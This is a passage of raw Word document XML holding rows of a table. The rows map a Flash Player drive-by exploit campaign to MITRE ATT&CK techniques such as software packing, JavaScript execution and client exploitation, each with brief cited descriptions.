              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1189</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Drive-by Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F11AE4B" w14:textId="6B2D6163" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="00DF59F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14585674" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF96680" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49DE057B" w14:textId="6075A36D" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65851660" w14:textId="5CA905B2" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E54EA3" w:rsidRPr="000966C3" w14:paraId="2B4F7F3E" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6553C5CA" w14:textId="57A66A71" w:rsidR="00E54EA3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D7C38D" w14:textId="77777777" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4575EB03" w14:textId="102838B7" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidR="00BD59F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>.002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
            <w:r w:rsidR="00BD59F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> : Software Packing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C5B66B" w14:textId="2EC84B2A" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56F40907" w14:textId="77777777" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B0B296E" w14:textId="77777777" w:rsidR="00E54EA3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="264163A3" w14:textId="75BD8C08" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359835AA" w14:textId="77777777" w:rsidR="00E54EA3" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The Adobe Flash Player exploit is packed with a simple RC4 packer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="000966C3" w14:paraId="6B922A81" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB7BD21" w14:textId="28B7EF2B" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="00E54EA3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52DFA4DB" w14:textId="34C44E1A" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68C447CA" w14:textId="528C622F" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.007</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D02EF3E" w14:textId="1AA57C38" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="00DF59F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A0F5B8" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFF3F4E" w14:textId="6A90B17D" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="342C544D" w14:textId="0E52FDFE" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEL/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F996E74" w14:textId="77777777" w:rsidR="00EF1E61" w:rsidRDefault="00EF1E61" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> profiling</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23AAD3F5" w14:textId="31F8C48F" w:rsidR="007545F1" w:rsidRPr="000966C3" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00EF1E61" w:rsidRPr="00EF1E61">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Once a target host was profiled, victims downloaded a malicious Adobe Flash Player SWF file and an FLV file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F834DC" w:rsidRPr="000966C3" w14:paraId="1015DBB0" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C72247" w14:textId="3199A569" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="127AB877" w14:textId="247783FC" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09036954" w14:textId="08F78712" w:rsidR="00F834DC" w:rsidRPr="00EF1E61" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62EC628D" w14:textId="1B056E3F" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218DAD6A" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53428E74" w14:textId="3A631CE9" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5FD4E7" w14:textId="76B5D3DD" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="667776CF" w14:textId="2EED000B" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The Adobe Flash Player exploit is packed with a simple RC4 packer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F834DC" w:rsidRPr="000966C3" w14:paraId="1CBCC4E4" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29820B13" w14:textId="636F13CE" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CEF9E1B" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F917995" w14:textId="230A4DFA" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1E61">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF1E61">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1203</w:t>
            </w:r>
            <w:r w:rsidR="00C91036">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1E61">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF201B3" w14:textId="79D7F92C" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11380F31" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EAB7224" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0246906B" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEL/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26330E51" w14:textId="1E6FC427" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The attack exploits an unpatched vulnerability in the way Adobe Flash Player parses Flash Video (FLV) files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C686A25" w14:textId="2AE1A9CF" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E54EA3">
              <w:rPr>
